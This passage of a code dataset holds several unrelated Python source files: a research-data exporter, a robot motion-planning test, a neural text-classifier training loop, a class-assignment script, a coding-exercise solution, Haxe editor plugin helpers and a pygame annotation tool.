WholeTaleLicense.default_spdx()\n )\n self.tale_license = WholeTaleLicense().license_from_spdx(license_spdx)\n self.state = {}\n for alg in self.algs:\n self.state[alg] = []\n\n def list_files(self):\n \"\"\"\n List contents of the version workspace and run directories.\n\n Returns a tuple for each file:\n fullpath - absolute path to a file\n relpath - path to a file relative to workspace root\n \"\"\"\n for obj in [self.manifest[\"dct:hasVersion\"]] + self.manifest[\"wt:hasRecordedRuns\"]:\n uri = obj[\"@id\"]\n obj_type = obj[\"@type\"]\n obj_id = uri.rsplit(\"/\", 1)[-1]\n folder = Folder().load(obj_id, user=self.user, level=AccessType.READ)\n workspace_path = folder[\"fsPath\"] + \"/workspace\"\n for curdir, _, files in os.walk(workspace_path):\n for fname in files:\n fullpath = os.path.join(curdir, fname)\n if obj_type == \"wt:RecordedRun\":\n relpath = fullpath.replace(workspace_path, \"runs/\" + obj[\"schema:name\"])\n else:\n relpath = fullpath.replace(workspace_path, \"workspace\")\n yield fullpath, relpath\n\n @staticmethod\n def bytes_from_file(filename, chunksize=8192):\n with open(filename, mode=\"rb\") as f:\n while True:\n chunk = f.read(chunksize)\n if chunk:\n yield chunk\n else:\n break\n\n def stream(self):\n raise NotImplementedError\n\n @staticmethod\n def stream_string(string):\n return (_.encode() for _ in (string,))\n\n def dump_and_checksum(self, func, zip_path):\n hash_file_stream = HashFileStream(func)\n for data in self.zip_generator.addFile(hash_file_stream, zip_path):\n yield data\n # MD5 is the only required alg in profile. See Manifests-Required in\n # https://raw.githubusercontent.com/fair-research/bdbag/master/profiles/bdbag-ro-profile.json\n self.state['md5'].append((zip_path, hash_file_stream.md5))\n\n def _agg_index_by_uri(self, uri):\n aggs = self.manifest[\"aggregates\"]\n return next((i for (i, d) in enumerate(aggs) if d['uri'] == uri), None)\n\n def append_aggergate_checksums(self):\n \"\"\"\n Takes the md5 checksums and adds them to the files in the 'aggregates' section\n :return: None\n \"\"\"\n aggs = self.manifest[\"aggregates\"]\n for path, chksum in self.state['md5']:\n uri = \"./\" + path.replace(\"data/\", \"\", 1)\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index]['wt:md5'] = chksum\n self.verify_aggregate_checksums()\n\n def verify_aggregate_checksums(self):\n \"\"\"Check if every aggregate has a proper checksum.\"\"\"\n algs = {f\"wt:{alg}\" for alg in self.algs}\n for index, agg in enumerate(self.manifest[\"aggregates\"]):\n if algs - set(agg.keys()) == algs:\n try:\n req = requests.get(agg[\"uri\"], allow_redirects=True, stream=True)\n except requests.exceptions.InvalidSchema:\n # globus...\n continue\n md5sum = md5()\n for chunk in req.iter_content(chunk_size=4096):\n md5sum.update(chunk)\n self.manifest[\"aggregates\"][index][\"wt:md5\"] = md5sum.hexdigest()\n\n def append_aggregate_filesize_mimetypes(self):\n \"\"\"\n Adds the file size and mimetype to the workspace files\n :return: None\n \"\"\"\n magic_wrapper = magic.Magic(mime=True, uncompress=True)\n aggs = self.manifest[\"aggregates\"]\n for fullpath, relpath in self.list_files():\n uri = \"./\" + relpath\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index][\"wt:mimeType\"] = (\n magic_wrapper.from_file(fullpath) or \"application/octet-stream\"\n )\n aggs[index][\"wt:size\"] = os.path.getsize(fullpath)\n\n def append_extras_filesize_mimetypes(self, extra_files):\n \"\"\"\n Appends the mimetype and size to the extra files in the 'aggregates 'section\n :param extra_files: Dictionary of extra file names\n :type extra_files: dict\n :return: None\n \"\"\"\n aggs = self.manifest[\"aggregates\"]\n for path, content in extra_files.items():\n uri = \"./\" + path.replace(\"data/\", \"\", 1)\n index = self._agg_index_by_uri(uri)\n if index is not None:\n aggs[index][\"wt:mimeType\"] = \"text/plain\"\n aggs[index][\"wt:size\"] = len(content)\n\n @staticmethod\n def formated_dump(obj, **kwargs):\n return json.dumps(\n obj, cls=JsonEncoder, sort_keys=True, allow_nan=False, **kwargs\n )\n","sub_path":"server/lib/exporters/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"168949278","text":"#!/usr/bin/env python2\n\n# File: test_or.py\n# Author: Chris Dellin \n# Copyright: 2015 Carnegie Mellon University\n# License: BSD\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n\nimport atexit\nimport sys\nimport time\nimport numpy\nimport openravepy\n\nlambda_ = 0.0001\n#lambda_ = 0.5\n#lambda_ = 0.9999\nw_inter_step = False\nw_selfcc = False\n\n# hardcoded poses (openrave order, qw qx qy qz x y z)\nR12 = numpy.sqrt(0.5)\nT = lambda pose: openravepy.matrixFromPose(pose)\nT_r = T([ R12, 0., 0., -R12, -0.3975, 2.38, 0. ])\nT_table = T([ R12, 0., 0., -R12, -0.3975, 1.61, 0. ])\nT_bin = T([ R12, 0., 0., -R12, -1.1, 2.3, 0. ])\nT_ee_palm = T([ 1., 0., 0., 0., 0., 0., 0.1365 ])\nT_mug_grasp1 = T([ 0.5,-0.5,-0.5, 0.5, 0.15, 0., 0.09 ])\nT_mugT = T([ 0., 0., 0., 1., -0.3975, 1.61, 0.735 ]) # table\nT_mugD = T([-R12, 0., 0., R12, -1.1, 2.3, 0.0 ]) # bin\nT_mug_drop = T([-R12, 0., 0., R12, -1.1, 2.3, 0.735 ]) # drop location\n# robot dof values\nr_dofvals = [\n 5.759, -1.972, -0.22, 1.9, 0., 0., 0., 1.3,1.3,1.3,0., # right\n 0.630, -1.900, 0.15, 1.9, 0., 0., 0., 2.3,2.3,2.3,0. # left\n]\n\n# create an environment, load the robot (wam)\nopenravepy.RaveInitialize(True, level=openravepy.DebugLevel.Info)\natexit.register(openravepy.RaveDestroy)\ne = openravepy.Environment()\natexit.register(e.Destroy)\n\n#e.SetViewer('qtcoin')\n\n# load a robot, ik solver\nr = e.ReadRobotXMLFile('robots/herb2_padded_nosensors.robot.xml')\ne.Add(r)\nr.SetTransform(T_r)\nr.SetDOFValues(r_dofvals,range(len(r_dofvals)))\nr.SetActiveManipulator('right_wam')\nr.SetActiveDOFs(r.GetActiveManipulator().GetArmIndices())\nikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(r,\n iktype=openravepy.IkParameterization.Type.Transform6D)\nif not ikmodel.load():\n ikmodel.autogenerate()\n\n# HACK\nfor joint in r.GetJoints():\n joint.SetResolution(0.05)\n\n# do some sweet stuff\nif False:\n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n pp_self = openravepy.Planner.PlannerParameters()\n pp_self.SetExtraParameters('1')\n p.InitPlan(r, pp_self)\n t = openravepy.RaveCreateTrajectory(e, '')\n p.PlanPath(t)\n p.SendCommand('CacheSetLocation mycache')\n p.SendCommand('CacheSave')\n print('bailing super early!')\n exit()\n\n# add fixed objects (kitchen, table, bin)\nkbs = {}\nkbs['kitchen'] = e.ReadKinBodyXMLFile('environments/pr_kitchen.kinbody.xml')\nkbs['table'] = e.ReadKinBodyXMLFile('objects/furniture/table_zup.kinbody.xml')\nkbs['bin'] = e.ReadKinBodyXMLFile('objects/household/recyclingbin-zlevel.kinbody.xml')\nkbs['mug'] = e.ReadKinBodyXMLFile('objects/household/mug2.kinbody.xml')\nfor name,kb in kbs.items():\n if not kb:\n raise RuntimeError('kinbody {} not found!'.format(name))\n e.Add(kb)\nkbs['table'].SetTransform(T_table)\nkbs['bin'].SetTransform(T_bin)\n\n# get iks for mug on table\nkbs['mug'].SetTransform(T_mugT)\nH = numpy.dot(\n numpy.dot(kbs['mug'].GetTransform(), T_mug_grasp1),\n numpy.linalg.inv(T_ee_palm)\n )\nmugiksT = r.GetActiveManipulator().FindIKSolutions(H, openravepy.IkFilterOptions.CheckEnvCollisions)\n\n# get iks for mug at drop location\nkbs['mug'].SetTransform(T_mug_drop)\nH = numpy.dot(\n numpy.dot(kbs['mug'].GetTransform(), T_mug_grasp1),\n numpy.linalg.inv(T_ee_palm)\n )\nmugiksdrop = r.GetActiveManipulator().FindIKSolutions(H, openravepy.IkFilterOptions.CheckEnvCollisions)\n\n\n# create the three problem definitions (encoded as planner parameters xmls)\n\ndef s1():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(T_mugT)\n #r.SetDOFValues([0.,0.,0.,0.],[7,8,9,10]) # open\npp1 = openravepy.Planner.PlannerParameters()\npp1.SetExtraParameters(''\n + '5.759 -1.972 -0.22 1.9 0. 0. 0.\\n'\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksT])\n + '{}'.format(lambda_)\n + '2.0'\n)\n\ndef s2():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(reduce(numpy.dot,(\n r.GetActiveManipulator().GetEndEffectorTransform(),\n T_ee_palm,\n numpy.linalg.inv(T_mug_grasp1)\n )))\n #r.SetDOFValues([1.5,1.5,1.5,0.],[7,8,9,10]) # closed\n r.Grab(kbs['mug'])\npp2 = openravepy.Planner.PlannerParameters()\npp2.SetExtraParameters(''\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksT])\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksdrop])\n + '{}'.format(lambda_)\n + '2.0'\n)\n\ndef s3():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(T_mugD)\n #r.SetDOFValues([0.,0.,0.,0.],[7,8,9,10]) # open\npp3 = openravepy.Planner.PlannerParameters()\npp3.SetExtraParameters(''\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksdrop])\n + '5.759 -1.972 -0.22 1.9 0. 0. 0.\\n'\n + '{}'.format(lambda_)\n + '2.0'\n)\n\nplans = [[s1,pp1],[s2,pp2],[s3,pp3]]\n\n\n\ntimes = []\ntrajs = []\n\nif w_inter_step:\n\n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n p.SendCommand('SetRoadmap class=RoadmapSampledConst seed=419884521 batch_n=1000 radius=2')\n\n if w_selfcc:\n for name,kb in kbs.items():\n kb.Enable(False)\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n for name,kb in kbs.items():\n kb.Enable(True)\n \n for i,(s,pp) in enumerate(plans):\n \n s()\n m.SendCommand('TagCurrentSubset {} setup{} true'.format(r.GetName(),i+1))\n \n p.InitPlan(r,pp)\n \n t = openravepy.RaveCreateTrajectory(e, '')\n tic = time.time()\n p.PlanPath(t)\n toc = time.time()\n times.append(toc - tic)\n trajs.append(t)\n\n\nelse: # without inter-step\n \n for i,(s,pp) in enumerate(plans):\n \n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n p.SendCommand('SetRoadmap class=RoadmapSampledConst seed=419884521 batch_n=1000 radius=2')\n \n if w_selfcc:\n for name,kb in kbs.items():\n kb.Enable(False)\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n for name,kb in kbs.items():\n kb.Enable(True)\n \n s()\n m.SendCommand('TagCurrentSubset {} setup{} true'.format(r.GetName(),i+1))\n \n p.InitPlan(r,pp)\n \n if w_selfcc:\n p.SendCommand('CacheSetLocation mycache')\n p.SendCommand('CacheLoad 1')\n \n t = openravepy.RaveCreateTrajectory(e, '')\n tic = time.time()\n p.PlanPath(t)\n toc = time.time()\n times.append(toc - tic)\n trajs.append(t)\n \n e.Remove(m)\n \n# compute lengths\ntraj_lens = []\nfor traj in trajs:\n len_rad = 0.0\n for i in range(1,traj.GetNumWaypoints()):\n va = traj.GetWaypoint(i-1)\n vb = traj.GetWaypoint(i)\n len_rad += numpy.linalg.norm(va - vb)\n traj_lens.append(len_rad)\n\nprint('times:', times)\nprint('traj lens:', traj_lens)\n","sub_path":"test_multiset/scripts/test_or.py","file_name":"test_or.py","file_ext":"py","file_size_in_byte":7569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"17617377","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport time\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.externals import joblib\nfrom utils import check_labels, readable_time\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef train(model, iterator, optimizer, criterion):\n \n epoch_loss = 0\n per_label_preds = [[], [], [], [], [], []]\n per_label_true = [[], [], [], [], [], []]\n \n model.train()\n \n for i, batch in enumerate(iterator):\n \n optimizer.zero_grad()\n X, y = batch \n \n X = X.to(device)\n y = y.to(device)\n \n predictions = model(X)\n \n loss = criterion(predictions, y)\n loss.backward()\n optimizer.step()\n \n # convert true target\n batch_target = y.cpu().detach().numpy()\n logits_cpu = predictions.cpu().detach().numpy()\n\n # per_label_preds\n for j in range(6):\n label_preds = logits_cpu[:, j]\n per_label_preds[j].extend(label_preds)\n per_label_true[j].extend(batch_target[:, j])\n\n # calculate log loss\n epoch_loss += loss.item()\n\n print('\\r[{} / {}]: Loss = {:.4f}'.format(\n i, len(iterator), loss.item(), end=''))\n \n label_auc = []\n\n for i in range(6):\n label_auc.append(roc_auc_score(per_label_true[i], per_label_preds[i]))\n \n return epoch_loss / len(iterator), np.mean(label_auc)\n\n\ndef evaluate(model, iterator, criterion):\n epoch_loss = 0\n per_label_preds = [[], [], [], [], [], []]\n per_label_true = [[], [], [], [], [], []]\n preds = []\n\n model.eval()\n \n with torch.no_grad():\n \n for i, batch in enumerate(iterator):\n X, y = batch\n \n X = X.to(device)\n predictions = model(X)\n \n # convert true target\n logits_cpu = predictions\n \n if not check_labels(y): \n y = y.to(device)\n loss = criterion(predictions, y)\n batch_target = y.cpu().detach().numpy() \n logits_cpu = logits_cpu.cpu().detach().numpy()\n\n preds.append(logits_cpu)\n\n # per_label_preds\n for j in range(6):\n label_preds = logits_cpu[:, j]\n per_label_preds[j].extend(label_preds)\n per_label_true[j].extend(batch_target[:, j])\n\n # calculate log loss\n epoch_loss += loss.item()\n\n print('\\r[{} / {}]: Loss = {:.4f}'.format(\n i, len(iterator), loss.item(), end=''))\n else:\n probs = torch.sigmoid(logits_cpu).cpu().detach().numpy()\n preds.append(probs)\n \n label_auc = []\n\n if len(per_label_preds[0]) > 0:\n for i in range(6):\n label_auc.append(roc_auc_score(per_label_true[i], per_label_preds[i]))\n\n return epoch_loss / len(iterator), np.mean(label_auc) if len(label_auc) > 0 else 0, np.vstack(preds)\n\n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\n\ndef learn(model, trn_dl, vld_dl, vocab, config):\n vocab_size = len(vocab.itos)\n lr = config['lr']\n\n optimizer = optim.Adam(model.parameters(), lr=lr)\n criterion = nn.BCEWithLogitsLoss()\n\n model = model.to(device)\n criterion = criterion.to(device)\n\n N_EPOCHS = config['N_EPOCHS']\n best_valid_loss = float('inf')\n time_identifier = readable_time()\n\n for epoch in range(N_EPOCHS):\n start_time = time.time()\n \n train_loss, train_auc = train(model, trn_dl, optimizer, criterion)\n if vld_dl is not None: valid_loss, valid_auc, _ = evaluate(model, vld_dl, criterion)\n \n end_time = time.time()\n\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if vld_dl is not None:\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n best_model = model\n \n print('Saving best model found so far to disk')\n # save model to results directory\n torch.save(model.state_dict(), config['result_dir'] + config['model_name'] + '_' + time_identifier +'.pth')\n joblib.dump(config, config['result_dir'] + config['model_name'] + 'config_' + time_identifier + '.pkl')\n \n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train AUC: {train_auc:.3f}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. AUC: {valid_auc:.3f}') \n else:\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train AUC: {train_auc:.3f}')\n \n # save full trained model to disk\n if vld_dl is None:\n torch.save(model.state_dict(), config['result_dir'] + config['model_name'] + '_' + time_identifier +'_full.pth')\n joblib.dump(config, config['result_dir'] + config['model_name'] + 'config_full' + time_identifier + '.pkl')\n \n return model\n\n\ndef predictions(model, tst_dl, criterion, test_labels, fn):\n _, _, final_preds = evaluate(model, tst_dl, criterion=None)\n\n df = test_labels.copy()\n df.iloc[:, 1:] = final_preds\n df.to_csv(fn, index=False)\n\n return df\n","sub_path":"src/cnn_sent_classification/learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123611091","text":"import csv\n\n\nx1={\"None\":[],\n \"economics\":[],\n \"geography\":[],\n \"chemistry\":[],\n \"physics\":[],\n }\n\nx2={\"bafs\":[],\n \"biology\":[],\n \"chistory\":[],\n \"economics\":[],\n \"ict\":[],\n \"physics\":[],\n }\n\nx3={\"biology\":[],\n \"chemistry\":[],\n \"cliterature\":[],\n \"geography\":[],\n \"history\":[],\n \"va\":[],\n \"m2\":[],\n }\n\nsubject_column=[\"x1\",\"x2\",\"x3\"]\n\npreference_column=[\"pref1\",\"pref2\",\"pref3\",\"pref4\",\"pref5\",\"pref6\",\n \"pref7\",\"pref8\",\"pref9\",\"pref10\",\"pref11\",\"pref12\"]\n\nsubject_reference={\"x1\":x1,\n \"x2\":x2,\n \"x3\":x3,\n }\n\n\nwith open(\"/home/aerobucket/python/testing/random_subject.csv\") as subject:\n csvreader=list(csv.DictReader(subject,delimiter=\",\"))\n \n name_to_score={}\n average=[]\n name_list=[]\n\n for row in csvreader:\n name_to_score[float(row[\"average\"])]=row[\"name\"]\n average.append(float(row[\"average\"]))\n name_list.append(row[\"name\"])\n \n run_times=len(average)\n class_size=35\n\n # execute for every person\n for i in range(run_times):\n\n max_score=max(average)\n name=name_to_score[max_score] # find the person with higher marks\n\n # find the correct row \n for row in csvreader:\n \n if row[\"name\"] == name:\n\n # append electives to the classes\n for elective in subject_column:\n subj=row[elective]\n \n # check for people in the class\n if len(subject_reference[elective][subj]) < class_size:\n subject_reference[elective][subj].append(name) \n \n else:\n for preference in preference_column:\n subj_1=row[preference]\n \n if subj_1 in subject_reference[elective].keys() == True:\n if len(subject_reference[elective][subj_1]) < class_size:\n subject_reference[elective][subj_1].append(name)\n break \n\n average.remove(max_score)\n \n\nresults_header=[\"name\",\"x1\",\"x2\",\"x3\"]\n\n\nwith open(\"results.csv\",\"w\") as results:\n result_writer=csv.DictWriter(results,fieldnames=results_header)\n result_writer.writeheader()\n \n for n in name_list:\n \n row_dict={\"name\":n,}\n \n for elective_name,elective in subject_reference.items():\n \n for subject_name,subject in elective.items():\n \n if n in subject:\n row_dict[elective_name]=subject_name\n \n result_writer.writerow(row_dict)\n \n \n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"subject_selection.py","file_name":"subject_selection.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"180496489","text":"# 자세한 풀이: https://breathtaking-life.tistory.com/118\ndef solution(s):\n result = []\n relation = {'zero': '0', 'one': '1', 'two': '2', 'three': '3', 'four': '4',\n 'five': '5', 'six': '6', 'seven': '7', 'eight': '8', 'nine': '9'}\n\n arr = []\n for c in s:\n if c in relation.values(): \t\t# 문자가 0~9일 경우\n result.append(c) \t\t# 리스트에 바로 추가\n else: \t\t# 0~9가 아닐경우 변환 과정을 거침\n arr.append(c)\n tmp = ''.join(arr)\n if tmp in relation.keys():\n arr = []\n result.append(relation[tmp])\n\n return int(''.join(result))\n\n\n# 다른 풀이\nnum_dic = {\"zero\": \"0\", \"one\": \"1\", \"two\": \"2\", \"three\": \"3\", \"four\": \"4\",\n \"five\": \"5\", \"six\": \"6\", \"seven\": \"7\", \"eight\": \"8\", \"nine\": \"9\"}\n\n\ndef solution(s):\n answer = s\n for key, value in num_dic.items():\n answer = answer.replace(key, value)\n return int(answer)","sub_path":"jisu/week5/숫자 문자열과 영단어.py","file_name":"숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"299774095","text":"import sublime\nimport sublime_plugin\nimport re\n\nSCOPE_VAR = 'meta.variable.haxe.2'\nSCOPE_VAR_NAME = 'entity.name.variable.haxe.2'\nSCOPE_FUNC = 'meta.method.haxe.2'\nSCOPE_FUNC_BLOCK = 'meta.method.block.haxe.2'\nSCOPE_FUNC_NAME = 'entity.name.function.haxe.2'\nSCOPE_STATIC = 'meta.static.haxe.2'\nSCOPE_TYPE = 'meta.type'\nSCOPE_TYPE_BLOCK = 'meta.type.block.haxe.2'\nSCOPE_TYPE_NAME = 'entity.name.type.class.haxe.2'\n\nFIELD_FUNC = 'function'\nFIELD_VAR = 'var'\nFIELD_STATIC_FUNC = 'static function'\nFIELD_STATIC_VAR = 'static var'\n\nre_word = re.compile('^[_a-z]\\w*$')\n\n\ndef count_blank_lines(view, pos):\n whitespaces = ' \\t'\n src = view.substr(sublime.Region(0, view.size()))\n before, after = 0, 0\n\n for i in range(pos - 1, 0, -1):\n c = src[i]\n if c == '\\n':\n before += 1\n elif c not in whitespaces:\n break\n\n for i in range(pos, view.size()):\n c = src[i]\n if c == '\\n':\n after += 1\n elif c not in whitespaces:\n break\n\n return before, after\n\n\ndef filter_regions(inners, outers):\n contains = []\n ncontains = []\n ii, io, ni, no = 0, 0, len(inners), len(outers)\n\n if no == 0:\n return contains, inners[:]\n\n while io < no and ii < ni:\n inner = inners[ii]\n outer = outers[io]\n\n if outer.contains(inner):\n contains.append(inner)\n io += 1\n ii += 1\n continue\n\n if inner.begin() > outer.begin():\n io += 1\n else:\n ncontains.append(inner)\n ii += 1\n\n while ii < ni:\n ncontains.append(inners[ii])\n ii += 1\n\n return contains, ncontains\n\n\ndef find_cur_region(view, selector, as_string=False):\n rgns = view.find_by_selector(selector)\n pos = view.sel()[0].begin()\n\n for rgn in rgns:\n if rgn.contains(pos):\n if as_string:\n return view.substr(rgn)\n else:\n return rgn\n\n return None\n\n\ndef find_line_start_pos(view, pos):\n rgn = view.line(pos)\n pos = rgn.begin()\n line = view.substr(rgn)\n for c in line:\n if c == ' ' or c == '\\t':\n pos += 1\n else:\n break\n\n return pos\n\n\ndef find_regions(view, selector, in_region=None, incl_string=False):\n rgns = view.find_by_selector(selector)\n regions = []\n\n for rgn in rgns:\n if in_region is not None and in_region.contains(rgn):\n if incl_string:\n regions.append((rgn, view.substr(rgn)))\n else:\n regions.append(rgn)\n\n return regions\n\n\ndef get_context(view):\n ctx = {}\n ctx['view'] = view\n\n pos = view.sel()[0].begin()\n ctx['scope'] = view.scope_name(pos)\n\n word = get_context_word(view)\n if word:\n ctx['word'] = word\n\n if SCOPE_TYPE in ctx['scope']:\n ctx['type'] = get_context_type(view, ctx['scope'])\n\n if SCOPE_FUNC in ctx['scope']:\n ctx['function'] = get_context_function(view)\n\n return ctx\n\n\ndef get_context_function(view):\n ctx = {}\n\n rgn = find_cur_region(view, SCOPE_FUNC)\n ctx['region'] = rgn\n ctx['name'] = find_regions(view, SCOPE_FUNC_NAME, rgn, True)[0][1]\n ctx['block'] = find_regions(view, SCOPE_FUNC_BLOCK, rgn)[0]\n\n return ctx\n\n\ndef get_context_type(view, scope):\n ctx = {}\n\n type_groups = ('abstract', 'class', 'enum', 'interface', 'typedef')\n type_scope = None\n for group in type_groups:\n type_scope = 'meta.type.%s.haxe.2' % group\n if type_scope in scope:\n ctx['group'] = group\n break\n\n type_rgn = find_cur_region(view, type_scope)\n\n v_rgns = find_regions(view, SCOPE_VAR, type_rgn)\n vname_rgns = find_regions(view, SCOPE_VAR_NAME, type_rgn)\n f_rgns = find_regions(view, SCOPE_FUNC, type_rgn)\n fname_rgns = find_regions(view, SCOPE_FUNC_NAME, type_rgn)\n s_rgns = find_regions(view, SCOPE_STATIC, type_rgn)\n\n sv_rgns, v_rgns = filter_regions(v_rgns, s_rgns)\n sf_rgns, f_rgns = filter_regions(f_rgns, s_rgns)\n\n svname_rgns, vname_rgns = filter_regions(vname_rgns, sv_rgns)\n sfname_rgns, fname_rgns = filter_regions(fname_rgns, sf_rgns)\n\n ctx['region'] = type_rgn\n ctx['name'] = find_regions(view, SCOPE_TYPE_NAME, type_rgn, True)[0][1]\n ctx['block'] = find_regions(view, SCOPE_TYPE_BLOCK, type_rgn)[0]\n\n def combine(field_group, field_rgns, field_name_rgns):\n lst = []\n\n for i in range(0, len(field_rgns)):\n lst.append((\n field_group,\n view.substr(field_name_rgns[i]),\n field_rgns[i]))\n\n return lst\n\n ctx[FIELD_VAR] = combine(FIELD_VAR, v_rgns, vname_rgns)\n ctx[FIELD_STATIC_VAR] = combine(FIELD_STATIC_VAR, sv_rgns, svname_rgns)\n ctx[FIELD_FUNC] = combine(FIELD_FUNC, f_rgns, fname_rgns)\n ctx[FIELD_STATIC_FUNC] = combine(FIELD_STATIC_FUNC, sf_rgns, sfname_rgns)\n\n return ctx\n\n\ndef get_fieldnames(context):\n lst = []\n\n lst.extend([tup[1] for tup in context['type'][FIELD_VAR]])\n lst.extend([tup[1] for tup in context['type'][FIELD_STATIC_VAR]])\n lst.extend([tup[1] for tup in context['type'][FIELD_FUNC]])\n lst.extend([tup[1] for tup in context['type'][FIELD_STATIC_FUNC]])\n\n return lst\n\n\ndef get_context_word(view):\n pos = view.sel()[0].begin()\n word_rgn = view.word(pos)\n word = view.substr(word_rgn)\n scope = view.scope_name(word_rgn.begin())\n\n if not re_word.match(word):\n return None\n\n ignore_scopes = (\n 'comment', 'constant', 'entity', 'keyword', 'storage', 'string')\n for sc in ignore_scopes:\n if sc in scope:\n return None\n\n return word\n\n\ndef get_indent(view, pos):\n return ''\n\n\ndef is_haxe_scope(view):\n return view.score_selector(0, \"source.haxe.2\") > 0\n\n\ndef set_pos(view, pos):\n view.sel().clear()\n view.sel().add(sublime.Region(pos, pos))\n view.show_at_center(pos)\n\n","sub_path":"features/haxe_generate_code_helper.py","file_name":"haxe_generate_code_helper.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"285273556","text":"import pygame\nimport sys\nimport random\nimport numpy as np\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport os\nfrom buttons import*\n\ndef event(surface, pos, todraw,rad, screen, redo, redorad, index, pictures, prevind, txt, height, width, save_index, key_index, label1, label2, count_sub):\n r1 = pygame.Rect((S_HEIGHT+20,0),(170, S_WIDTH+150))\n r2 = pygame.Rect((0,S_WIDTH+20),(S_HEIGHT+200, 170))\n r3 = pygame.Rect((0,0),(20, S_WIDTH+200))\n r4 = pygame.Rect((0,0),(S_HEIGHT+20, 20))\n key_state = pygame.key.get_pressed()\n #print(key_index)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n keys = pygame.key.get_pressed() \n if (event.key == pygame.K_k): # or (keys[pygame.K_r]):\n key_index = (key_index+1)%len(todraw) \n text_render(surface, surface,label1, label2, todraw) \n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif event.key == pygame.K_g:\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_RIGHT)or (keys[pygame.K_RIGHT]):\n prevind = index\n save_index = (index+1)%len(pictures)+ count_sub\n index = (index+ 1)%len(pictures)\n text_render(surface, surface,label1, label2, todraw)\n elif (event.key == pygame.K_LEFT)or (keys[pygame.K_LEFT]):\n prevind = index\n save_index = (index-1)%len(pictures)+ count_sub\n index = (index-1)%len(pictures)\n text_render(surface, surface,label1, label2, todraw)\n elif (event.key == pygame.K_SPACE):\n img = pygame.surfarray.pixels3d(screen)\n img = img[20:S_WIDTH+20,20:S_HEIGHT+20,:]\n img = ndimage.rotate(img,90)\n img = img[::-1,:]\n if len(pictures)>0:\n org_image = plt.imread(f\"{dir}/{pictures[index]}\")\n #plt.imsave(f\"{dir_save}/{save_index}.jpeg\", org_image)\n with open(f\"{txtsave}/{txt[index]}\", 'w') as f:\n for i in range(len(todraw)):\n f.write(f\"{int((todraw[i][0]-19)*width/S_WIDTH)}\\t{int((todraw[i][1]-19)*height/S_HEIGHT)}\\t{int(0.5+rad[i]*width/S_WIDTH)}\\t{label1[i]}\\t{label2[i]}\\n\")\n save_index = (index+1)%len(pictures) + count_sub\n prevind = index\n index = (index+ 1)%len(pictures)\n elif (event.key == pygame.K_c):\n if len(todraw)>0:\n redo= todraw\n todraw = []\n redorad = rad\n rad = []\n screen.blit(surface, (0,0))\n pygame.display.update()\n\n\n # Classify according to the keys\n elif (event.key 